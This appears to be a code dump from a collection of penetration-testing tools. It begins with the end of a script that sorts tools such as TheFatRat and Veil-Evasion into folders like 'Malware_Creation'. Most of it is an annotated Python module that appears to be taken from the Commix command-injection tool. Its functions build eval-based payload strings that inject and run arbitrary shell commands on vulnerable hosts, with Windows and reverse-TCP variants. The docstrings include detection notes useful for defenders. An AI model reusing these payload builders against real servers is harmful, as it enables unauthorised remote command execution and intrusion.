"MitM/" 216 | mv "TekDefense-Automater/" "Web_Server_Exploitation/" 217 | mv "termineter/" "Hardware_Related/" 218 | mv "the-backdoor-factory/" 
"Malware_Creation/" 219 | mv "The-Eye/" "Other/" 220 | mv "TheFatRat/" "Malware_Creation/" 221 | mv "torshammer/" "Stress_Testing/" 222 | mv "V3n0M-Scanner/" "Web_Server_Exploitation/" 223 | mv "vbscan/" "Web_Server_Exploitation/" 224 | mv "Veil-Evasion/" "Malware_Creation/" 225 | mv "volatility/" "Forensics/" 226 | mv "w3af/" "Web_Server_Exploitation/" 227 | mv "wafw00f/" "Web_Server_Exploitation/" 228 | mv "waybackpack/" "Other/" 229 | mv "weeman/" "Web_Server_Exploitation/" 230 | mv "weevely3/" "Web_Server_Exploitation/" 231 | mv "WhatWeb/" "Web_Server_Exploitation/" 232 | mv "wifijammer/" "Wireless_Exploitation/" 233 | mv "wifiphisher/" "Wireless_Exploitation/" 234 | mv "wifite/" "Wireless_Exploitation/" 235 | mv "Windows-Exploit-Suggester/" "Other/" 236 | mv "wpscan/" "Web_Server_Exploitation/" 237 | mv "xortool/" "Reverse_Engineering/" 238 | mv "xrdp/" "General_Exploitation/" 239 | mv "yersinia/" "Stress_Testing/" 240 | mv "zarp/" "General_Exploitation/" 241 | 242 | 243 | echo "Finished!" 244 | -------------------------------------------------------------------------------- /commix/src/core/injections/results_based/techniques/eval_based/eb_payloads.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # encoding: UTF-8 3 | 4 | """ 5 | This file is part of Commix Project (http://commixproject.com). 6 | Copyright (c) 2014-2017 Anastasios Stasinopoulos (@ancst). 7 | 8 | This program is free software: you can redistribute it and/or modify 9 | it under the terms of the GNU General Public License as published by 10 | the Free Software Foundation, either version 3 of the License, or 11 | (at your option) any later version. 12 | 13 | For more see the file 'readme/COPYING' for copying permission. 14 | """ 15 | 16 | from src.utils import settings 17 | 18 | """ 19 | The dynamic code evaluation (aka eval-based) technique. 20 | The available "eval-based" payloads. 
"""

def decision(separator, TAG, randv1, randv2):
    """
    Assemble the eval-based probe string (the "is the host vulnerable" check).

    The function only concatenates text and returns it. The string is a
    print(...) expression around backtick-quoted commands -- presumably PHP,
    given the backticks and the "." concatenation; confirm against the tool's
    documentation. The command sequence is:

        echo TAG, [arithmetic command], echo TAG, echo TAG

    The arithmetic command adds randv1 and randv2 ("%2B" is a URL-encoded
    "+"). It is a "for /f ... set /a" loop when settings.TARGET_OS is "win",
    "echo $((...))" otherwise, and is left out when settings.SKIP_CALC is set.

    With an empty separator every command gets its own backtick pair and the
    pairs are joined with "."; otherwise all commands share one backtick pair,
    are joined with the separator, and the string ends with "%3B".

    Detection note: the repeated echo of one marker around a small sum, inside
    print(`...`), is a stable shape to match in request logs or WAF rules.
    """
    on_windows = settings.TARGET_OS == "win"
    skip_calc = settings.SKIP_CALC
    marker = "echo " + TAG

    commands = [marker]
    if not skip_calc:
        addition = str(randv1) + "%2B" + str(randv2)
        if on_windows:
            commands.append(
                "for /f \"tokens=*\" %i in ('cmd /c \"set /a (" + addition +
                ")\"') do @set /p =%i < nul"
            )
        else:
            commands.append("echo $((" + addition + "))")
    commands.extend([marker, marker])

    if separator == "":
        # One backtick pair per command; the trailing separator is the empty
        # string here and is kept only to mirror the original expression.
        quoted = ["`" + command + "`" for command in commands]
        return "print(" + ".".join(quoted) + ")" + separator

    # One shared backtick pair, commands chained with the separator.
    chained = commands[0]
    for command in commands[1:]:
        chained = chained + separator + command
    return "print(`" + chained + "`)%3B"

"""
__Warning__: The alternative shells are still experimental.
"""

def decision_alter_shell(separator, TAG, randv1, randv2):
    """
    Assemble the eval-based probe string for the alternative (Python) shell.

    Same layout as the regular probe -- echo TAG, an optional arithmetic
    command, echo TAG twice -- but the sum of randv1 and randv2 is computed by
    a "python -c" one-liner. The interpreter is settings.WIN_PYTHON_DIR when
    settings.TARGET_OS is "win" and plain "python" otherwise. Both values go
    through int() first, so a non-numeric value raises before anything is
    built. settings.SKIP_CALC drops the arithmetic command.

    With an empty separator the one-liner is prefixed with " cmd /c " on
    Windows and a single space elsewhere; with a separator it is inserted
    without a prefix. The file marks the alternative shells as experimental.

    Detection note: 'python -c "print str(int(' followed by two integers
    joined with "%2B" is specific enough to search for in request logs.
    """
    if settings.TARGET_OS == "win":
        interpreter = settings.WIN_PYTHON_DIR
        prefix = " cmd /c "
    else:
        interpreter = "python"
        prefix = " "
    python_payload = (interpreter + " -c \"print str(int(" +
                      str(int(randv1)) + "%2B" + str(int(randv2)) + "))\"")

    skip_calc = settings.SKIP_CALC
    one_pair_per_command = separator == ""
    marker = "echo " + TAG

    commands = [marker]
    if not skip_calc:
        if one_pair_per_command:
            commands.append(prefix + python_payload)
        else:
            commands.append(python_payload)
    commands.extend([marker, marker])

    if one_pair_per_command:
        # The trailing separator is the empty string here; kept to mirror the
        # original expression.
        quoted = ["`" + command + "`" for command in commands]
        return "print(" + ".".join(quoted) + ")" + separator

    chained = commands[0]
    for command in commands[1:]:
        chained = chained + separator + command
    return "print(`" + chained + "`)%3B"

"""
Execute shell commands on vulnerable host.
"""

def cmd_execution(separator, TAG, cmd):
    """
    Assemble the eval-based string that carries cmd between marker echoes.

    The function only concatenates text and returns it. The layout is two
    "echo TAG" commands, then cmd, then two more "echo TAG" commands, all
    inside print(`...`). When settings.TARGET_OS is "win", cmd is first
    wrapped in a "for /f ... do @set /p" loop and prefixed with " cmd /c ".

    With an empty separator each command has its own backtick pair, joined
    with "."; otherwise the marker is single-quoted, the commands are chained
    with the separator inside one backtick pair, and the string ends "%3B".

    Detection note: the marker appears twice before and twice after the
    embedded command, so a request or log line with four identical echo
    arguments inside print(`...`) matches this builder.
    """
    if settings.TARGET_OS == "win":
        wrapped = ("for /f \"tokens=*\" %i in ('cmd /c " + cmd +
                   "') do @set /p =%i < nul")
        middle = " cmd /c " + wrapped
    else:
        middle = cmd

    if separator == "":
        marker = "echo " + TAG
        commands = [marker, marker, middle, marker, marker]
        quoted = ["`" + command + "`" for command in commands]
        return "print(" + ".".join(quoted) + ")"

    marker = "echo '" + TAG + "'"
    chained = marker
    for command in (marker, middle, marker, marker):
        chained = chained + separator + command
    return "print(`" + chained + "`)%3B"


def cmd_execution_alter_shell(separator, TAG, cmd):
    """
    Assemble the command-carrying string for the alternative (Python) shell.

    The file marks the alternative shells as experimental.

    When settings.TARGET_OS is "win":
      * with settings.REVERSE_TCP set, the result is just separator + cmd
        followed by one space, with no markers and no print(...) wrapper;
      * otherwise cmd is placed inside an os.system('...') call run by
        settings.WIN_PYTHON_DIR, wrapped in a "for /f" loop and prefixed with
        " cmd /c ".
    On any other target cmd is inserted unchanged.

    Apart from the REVERSE_TCP case the layout is: marker, marker, command,
    marker, marker -- one backtick pair per command joined with "." when the
    separator is empty, else single-quoted markers chained with the separator
    inside one backtick pair and a trailing "%3B".
    """
    if settings.TARGET_OS == "win":
        if settings.REVERSE_TCP:
            return separator + cmd + " "
        python_payload = ("for /f \"tokens=*\" %i in ('cmd /c " +
                          settings.WIN_PYTHON_DIR +
                          " -c \"import os; os.system('" + cmd + "')\"" +
                          "') do @set /p =%i < nul")
        middle = " cmd /c " + python_payload
    else:
        middle = cmd

    if separator == "":
        marker = "echo " + TAG
        commands = [marker, marker, middle, marker, marker]
        quoted = ["`" + command + "`" for command in commands]
        return "print(" + ".".join(quoted) + ")"

    marker = "echo '" + TAG + "'"
    chained = marker
    for command in (marker, middle, marker, marker):
        chained = chained + separator + command
    return "print(`" + chained + "`)%3B"

#eof
--------------------------------------------------------------------------------